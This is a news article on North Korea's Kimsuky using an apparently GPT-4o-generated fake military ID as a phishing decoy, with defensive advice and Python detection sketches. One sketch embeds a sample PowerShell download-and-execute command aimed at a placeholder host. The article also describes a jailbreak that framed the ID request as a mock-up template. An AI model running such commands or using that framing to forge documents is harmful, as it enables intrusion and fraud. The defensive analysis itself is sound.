
Kimsuky Phishers Employed ChatGPT to Craft ID Images

By Bill Thompson
Last updated: October 29, 2025 11:45 am
Technology · 6 Min Read

A North Korean threat actor known as Kimsuky leveraged OpenAI-powered image generation to reinforce a targeted phishing attack, according to new analysis from security firm Genians.

The hackers had concocted a realistic image of a South Korean military ID to legitimize their lure, but they left behind telltale metadata referencing “GPT-4o*OpenAI API” and “ChatGPT,” investigators said. A deepfake-detection tool rated the ID photo as 98 percent likely to be AI-generated.

Table of Contents
  • How the Lure Worked
  • AI Fingerprints on the Fake ID
  • Why This Matters
  • Defensive Takeaways
  • A Wider Pattern of AI Abuse
[Image: The white OpenAI logo with GPT-4o text on a subtle green-to-gray gradient background]

How the Lure Worked

The campaign impersonated a South Korean defense-related institution that issues identification to military-affiliated individuals, Genians says. The emails originated from a domain crafted to closely resemble that of the real organization and carried a ZIP attachment that incorporated the recipient’s name for added credibility.

A Windows shortcut disguised as documentation lurked inside the archive. If executed, it launched a PowerShell command that connected the victim’s machine to a remote server, installed backdoor malware, and then quietly retrieved an image of what appears to be a fake government ID. The decoy supplied the story line itself — “this is routine ID processing” — while the intrusion played out in the background.
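As a rough illustration of the first defensive check this kind of lure invites, the sketch below scans a ZIP archive for members with risky extensions, including the double-extension disguise (e.g. a name ending in `.pdf.lnk`) that makes a shortcut look like a document. This is a hypothetical triage heuristic, not Genians’ tooling, and the filenames are invented.

```python
# Illustrative sketch (not Genians' tooling): flag archive members whose
# names suggest a disguised Windows shortcut, e.g. "form.pdf.lnk".
import io
import zipfile

SUSPICIOUS_EXTENSIONS = (".lnk", ".js", ".vbs", ".hta", ".scr")

def suspicious_members(zip_bytes: bytes) -> list[str]:
    """Return archive member names ending in a risky extension,
    catching double-extension disguises like 'doc.pdf.lnk'."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return [
            name for name in zf.namelist()
            if name.lower().endswith(SUSPICIOUS_EXTENSIONS)
        ]

# Demo with a synthetic archive mimicking the lure's layout.
buf = io.BytesIO()
with zipfile.ZipFile(buf, "w") as zf:
    zf.writestr("ID_photo_guidelines.pdf.lnk", b"fake shortcut bytes")
    zf.writestr("readme.txt", b"benign")
print(suspicious_members(buf.getvalue()))  # ['ID_photo_guidelines.pdf.lnk']
```

Mail gateways and sandboxes apply far richer checks, but even this cheap filter would have surfaced the shortcut before a user could double-click it.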

AI Fingerprints on the Fake ID

Genians said the fake ID contained metadata showing it had been generated by OpenAI’s GPT-4o model via API access.

While OpenAI’s systems prevent images of actual government IDs from being created, researchers theorize that the attackers may have skirted the restrictions by framing their request to mimic a harmless mock-up or template — an approach frequently referred to as a jailbreak.
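The kind of metadata clue Genians described can be triaged with a simple scan. The sketch below searches an image’s raw bytes for generator strings like the ones reported (“GPT-4o,” “OpenAI,” “ChatGPT”); it is a quick illustrative heuristic, not a substitute for properly parsing XMP or C2PA provenance metadata, and the sample bytes are synthetic.

```python
# Illustrative triage sketch: look for generator strings in an image's
# raw bytes. Real provenance checks should parse XMP/C2PA metadata;
# a substring scan is only a first-pass heuristic.

AI_MARKERS = (b"GPT-4o", b"OpenAI", b"ChatGPT", b"c2pa")

def ai_generation_markers(image_bytes: bytes) -> list[str]:
    """Return any known AI-generator marker strings found in the bytes."""
    return [m.decode() for m in AI_MARKERS if m in image_bytes]

# Synthetic bytes standing in for an image with embedded XMP metadata.
sample = b"\x89PNG...<xmp>GPT-4o OpenAI API</xmp>..."
print(ai_generation_markers(sample))  # ['GPT-4o', 'OpenAI']
```

Attackers can of course strip metadata, so absence of markers proves nothing; their presence, as in this campaign, is the giveaway.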

This is not the first time state-backed hackers have crossed paths with the AI industry. OpenAI and Microsoft Threat Intelligence have previously observed and disrupted activity from multiple government-aligned groups, including North Korea’s Kimsuky (which Microsoft tracks as Emerald Sleet). The latest findings indicate that such actors are still actively hunting for openings, especially in image tools that can create believable visual cover for social engineering.

Why This Matters

Phishing already trades heavily in trust cues — logos, signatures, familiar language. Factor in photo-realistic AI-generated images, and the bar for skepticism rises considerably. For many recipients, a glance at a plausible badge or form is “close enough” — particularly when the sender appears to know their name. It was that mixture of personalization and polished appearance that Kimsuky exploited.

[Diagram: the lure’s step-by-step mechanism]

The trend dovetails with other data on the effectiveness of social engineering. The latest Verizon Data Breach Investigations Report finds that most breaches involve the “human element,” citing phishing and pretexting as two of the most common initial access vectors. Kimsuky’s background — charted by South Korea’s National Intelligence Service, Mandiant and other researchers — is in credential theft, espionage and recruitment fraud targeting defense, policy and research communities.

Defensive Takeaways

Harden the fundamentals this campaign relies on: aggressively filter or quarantine incoming ZIP and shortcut files from outside sources; insist that users access attachments through approved, scanned portals; and discourage (in all but the most permissive environments) the manual “copy-paste this command” pattern. Multifactor authentication, while not perfect, goes a long way toward blunting the damage from credential theft that can follow a successful phish.

On endpoints, restrict and log PowerShell (e.g. constrained language mode and script block logging), watch for unusual child processes spawned by shell shortcuts, and apply strong egress controls to limit command-and-control traffic.
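To make the “unusual child processes” idea concrete, here is a hypothetical triage sketch that flags PowerShell launched from a shell shortcut (i.e. with `explorer.exe` as parent) whose command line shows common download cues. The event field names are illustrative, not any specific EDR’s schema.

```python
# Hypothetical detection sketch: PowerShell spawned by explorer.exe
# (as happens when a user opens a .lnk) with download cues in the
# command line. Field names are illustrative, not a real EDR schema.

DOWNLOAD_CUES = ("downloadstring", "invoke-webrequest", "iwr ", "iex ")

def is_suspicious(event: dict) -> bool:
    cmd = event.get("command_line", "").lower()
    return (
        event.get("image", "").lower().endswith("powershell.exe")
        and event.get("parent_image", "").lower().endswith("explorer.exe")
        and any(cue in cmd for cue in DOWNLOAD_CUES)
    )

# Synthetic event resembling a shortcut-launched download cradle.
event = {
    "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    "parent_image": r"C:\Windows\explorer.exe",
    "command_line": "powershell -w hidden IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://example.test/p')",
}
print(is_suspicious(event))  # True
```

Real detections would also weigh encoded commands, hidden-window flags, and network destinations, but parent-child lineage plus command-line cues catches a large share of shortcut-based lures.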

Deploy SPF, DKIM and DMARC on the mail domain to reduce brand spoofing. And update awareness training: a professional-looking ID photo is no proof of legitimacy in the age of generative AI. Verify through official channels, not email attachments.

A Wider Pattern of AI Abuse

Across the industry, researchers from Google’s Threat Analysis Group, Recorded Future and Mandiant have tracked North Korean operators using deepfakes, fake recruiter personas and AI-written outreach to build trust or land remote roles inside Western companies. The Kimsuky case adds something new: AI-generated imagery used not as the payload, but as camouflage for the intrusion itself.

As generative models improve, defenders should expect more polished decoys: forged licenses, invoices or utility notices that pass casual scrutiny. The pragmatic response is not to demonize AI, but to assume adversaries will adopt it and raise verification standards accordingly. If a message pushes you to open an archive, run a command or take an ID at face value, stop: trust has to be earned, not assumed from a picture.

By Bill Thompson
Bill Thompson is a veteran technology columnist and digital culture analyst with decades of experience reporting on the intersection of media, society, and the internet. His commentary has been featured across major publications and global broadcasters. Known for exploring the social impact of digital transformation, Bill writes with a focus on ethics, innovation, and the future of information.
FindArticles © 2025. All Rights Reserved.